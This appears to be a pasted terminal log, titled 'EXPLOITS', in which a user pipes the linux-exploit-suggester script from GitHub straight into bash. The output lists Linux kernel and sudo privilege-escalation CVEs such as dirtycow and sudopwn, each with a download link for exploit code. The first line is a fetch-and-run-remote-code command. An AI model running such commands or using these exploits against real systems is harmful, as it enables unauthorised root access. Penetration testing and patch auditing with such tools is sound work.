EXPLOITS

1. fourchan@jeff:~$ curl -o - https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
2. % Total % Received % Xferd Average Speed Time Time Time Current
3. Dload Upload Total Spent Left Speed
4. 100 43052 100 43052 0 0 73803 0 --:--:-- --:--:-- --:--:-- 73719
5.  
6. Kernel version: 4.4.0
7. Architecture: x86_64
8. Distribution: ubuntu
9. Package list: from current OS
10.  
11. Possible Exploits:
12.  
13. [+] [CVE-2015-3290] espfix64_NMI
14.  
15. Details: http://www.openwall.com/lists/oss-security/2015/08/04/8
16. Download URL: https://www.exploit-db.com/download/37722
17.  
18. [+] [CVE-2016-0728] keyring
19.  
20. Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
21. Download URL: https://www.exploit-db.com/download/40003
22. Comments: Exploit takes about ~30 minutes to run
23.  
24. [+] [CVE-2016-2384] usb-midi
25.  
26. Details: https://xairy.github.io/blog/2016/cve-2016-2384
27. Tags: ubuntu=14.04,fedora=22
28. Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
29. Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
30.  
31. [+] [N/A] target_offset
32.  
33. Details: https://www.exploit-db.com/exploits/40049/
34. Tags: ubuntu=16.04(kernel:4.4.0-21)
35. Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
36. Comments: ip_tables.ko needs to be loaded
37.  
38. [+] [CVE-2016-4557] double-fdput()
39.  
40. Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
41. Tags: ubuntu=16.04(kernel:4.4.0-62)
42. Download URL: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
43. Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
44.  
45. [+] [CVE-2016-5195] dirtycow
46.  
47. Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
48. Tags: RHEL=5|6|7,debian=7|8,ubuntu=16.10|16.04|14.04|12.04
49. Download URL: https://www.exploit-db.com/download/40611
50.  
51. [+] [CVE-2016-5195] dirtycow 2
52.  
53. Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
54. Tags: RHEL=5|6|7,debian=7|8,ubuntu=16.10|16.04|14.04|12.04
55. Download URL: https://www.exploit-db.com/download/40616
56.  
57. [+] [CVE-2016-8655] chocobo_root
58.  
59. Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
60. Tags: ubuntu=16.04|14.04
61. Download URL: https://www.exploit-db.com/download/40871
62.  
63. [+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
64.  
65. Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
66. Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
67. Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included
68.  
69. [+] [CVE-2017-6074] dccp
70.  
71. Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
72. Tags: ubuntu=16.04
73. Download URL: https://www.exploit-db.com/download/41458
74. Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
75.  
76. [+] [CVE-2017-7308] af_packet
77.  
78. Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
79. Tags: ubuntu=16.04(kernel:4.8.0-41)
80. Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
81. Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
82.  
83. [+] [CVE-2017-1000112] NETIF_F_UFO
84.  
85. Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
86. Tags: ubuntu=14.04(kernel:4.4.0-*)|16.04(kernel:4.8.0-*)
87. Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
88. Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included
89.  
90. [+] [CVE-2017-1000253] PIE_stack_corruption
91.  
92. Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
93. Tags: RHEL=7(kernel:3.10)
94. Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
95.  
96. [+] [CVE-2009-1185] udev
97.  
98. Details: https://www.exploit-db.com/exploits/8572/
99. Tags: ubuntu=8.10|9.04
100. Download URL: https://www.exploit-db.com/download/8572
101. Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
102.  
103. [+] [CVE-2009-1185] udev 2
104.  
105. Details: https://www.exploit-db.com/exploits/8478/
106. Download URL: https://www.exploit-db.com/download/8478
107. Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
108.  
109. [+] [CVE-2017-1000367] Sudoer-to-root
110.  
111. Details: https://www.sudo.ws/alerts/linux_tty.html
112. Tags: RHEL=7(sudo:1.8.6p7)
113. Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
114. Comments: Needs to be sudoer. Works only on SELinux enabled systems
115.  
116. [+] [CVE-2017-1000367] sudopwn
117.  
118. Details: https://www.sudo.ws/alerts/linux_tty.html
119. Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
120. Comments: Needs to be sudoer. Works only on SELinux enabled systems